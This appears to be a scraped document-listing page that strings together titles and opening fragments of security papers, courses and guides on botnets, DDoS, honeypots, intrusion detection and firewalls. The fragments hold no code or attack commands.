Detecting Bots with Automatically Generated Network Signatures Peter Wurzinger, Leyla Bilge, Thorsten Holz, Jan Goebel, Christopher Kruegel, Engin Kirda,, {pw,tho}@seclab.tuwien.ac.at Institute Eurecom,
More informationSECURING APACHE : DOS & DDOS ATTACKS - II
SECURING APACHE : DOS & DDOS ATTACKS - II How DDoS attacks are performed A DDoS attack has to be carefully prepared by the attackers. They first recruit the zombie army, by looking for vulnerable machines,
More informationHONEYPOTS The new-way Security Analysis
HONEYPOTS The new-way Security Analysis By D.R.Esesve B.Tech (ECE), MPIT (Networking Technology) dresesve@hotmail.com http://www.geocities.com/dresesve Symbiosis Center for Information Technology, Pune
More informationLinux Network Security
Linux Network Security Course ID SEC220 Course Description This extremely popular class focuses on network security, and makes an excellent companion class to the GL550: Host Security course. Protocols
More informationFirewalls & Intrusion Detection
Firewalls & Intrusion Detection CS 594 Special Topics/Kent Law School: Computer and Network Privacy and Security: Ethical, Legal, and Technical Consideration 2007, 2008 Robert H. Sloan Security Intrusion
More informationBotNets- Cyber Torrirism
BotNets- Cyber Torrirism Battling the threats of internet Assoc. Prof. Dr. Sureswaran Ramadass National Advanced IPv6 Center - Director Why Talk About Botnets? Because Bot Statistics Suggest Assimilation
More informationIPv6 Intrusion Detection Research Project
IPv6 Intrusion Detection Research Project Carsten Rossenhövel, EANTC AG Sven Schindler, Universität Potsdam Co-Financed By: Project Goals Independently assess the true, current risks of IPv6 attacks Develop
More informationUNMASKCONTENT: THE CASE STUDY
DIGITONTO LLC. UNMASKCONTENT: THE CASE STUDY The mystery UnmaskContent.com v1.0 Contents I. CASE 1: Malware Alert... 2 a. Scenario... 2 b. Data Collection... 2 c. Data Aggregation... 3 d. Data Enumeration...
More informationBotHunter: Detecting Malware Infection Through IDS-Driven Dialog Correlation
BotHunter: Detecting Malware Infection Through IDS-Driven Dialog Correlation Guofei Gu, Phillip Porras, Vinod Yegneswaran, Martin Fong, Wenke Lee USENIX Security Symposium (Security 07) Presented by Nawanol
More informationRadware Security Research. Reverse Engineering a Sophisticated DDoS Attack Bot. Author: Zeev Ravid
Reverse Engineering a Sophisticated DDoS Attack Bot Author: Zeev Ravid July 2015 Introduction In July 2015, Radware s Emergency Response Team (ERT) noticed a significant increased usage of the Tsunami
More informationA Pointillist Approach for Comparing Honeypots. Fabien Pouget, Thorsten Holz
A Pointillist Approach for Comparing Honeypots Fabien Pouget, Thorsten Holz Motivations What are the Modus Operandi of the perpetrators? Who has data to validate in a rigorous way any kind of taxonomy
More informationA Critical Investigation of Botnet
Global Journal of Computer Science and Technology Network, Web & Security Volume 13 Issue 9 Version 1.0 Year 2013 Type: Double Blind Peer Reviewed International Research Journal Publisher: Global Journals
More informationGetting Ahead of Malware
IT@Intel White Paper Intel Information Technology Security December 2009 Getting Ahead of Malware Executive Overview Since implementing our security event monitor and detection processes two years ago,
More informationNetwork Security Controls. CSC 482: Computer Security
Network Security Controls Topics 1. Firewalls 2. Virtual Private Networks 3. Intrusion Detection and Prevention 4. Honeypots What is a Firewall? A software or hardware component that restricts network
More informationAttacks from the Inside
Attacks from the Inside Eddy Willems, G Data Righard J. Zwienenberg, Norman Attacks from the Inside. Agenda - Social Networking / Engineering - Where are the threats coming from - Infection vectors - The
More informationDetecting Zero-Day Attack Signatures using Honeycomb in a Virtualized Network
Detecting Zero-Day Attack Signatures using Honeycomb in a Virtualized Network Reshma R. Patel Information Technology Department, L.D.College of Engineering, Ahmedabad, India. Chirag S. Thaker Information
More information2. From a control perspective, the PRIMARY objective of classifying information assets is to:
MIS5206 Week 13 Your Name Date 1. When conducting a penetration test of an organization's internal network, which of the following approaches would BEST enable the conductor of the test to remain undetected
More informationAppendix A: Configuring Firewalls for a VPN Server Running Windows Server 2003
http://technet.microsoft.com/en-us/library/cc757501(ws.10).aspx Appendix A: Configuring Firewalls for a VPN Server Running Windows Server 2003 Updated: October 7, 2005 Applies To: Windows Server 2003 with
More informationIntegrated Approach to Network Security. Lee Klarich Senior Vice President, Product Management March 2013
Integrated Approach to Network Security Lee Klarich Senior Vice President, Product Management March 2013 Real data from actual networks 2 2012, Palo Alto Networks. Confidential and Proprietary. 2008: HTTP,
More informationIntrusion Detection Systems
Intrusion Detection Systems Advanced Computer Networks 2007 Reinhard Wallner reinhard.wallner@student.tugraz.at Outline Introduction Types of IDS How works an IDS Attacks to IDS Intrusion Prevention Systems
More informationNetworking for Caribbean Development
Networking for Caribbean Development BELIZE NOV 2 NOV 6, 2015 w w w. c a r i b n o g. o r g N E T W O R K I N G F O R C A R I B B E A N D E V E L O P M E N T BELIZE NOV 2 NOV 6, 2015 w w w. c a r i b n
More informationHoneyBOT User Guide A Windows based honeypot solution
HoneyBOT User Guide A Windows based honeypot solution Visit our website at http://www.atomicsoftwaresolutions.com/ Table of Contents What is a Honeypot?...2 How HoneyBOT Works...2 Secure the HoneyBOT Computer...3
More information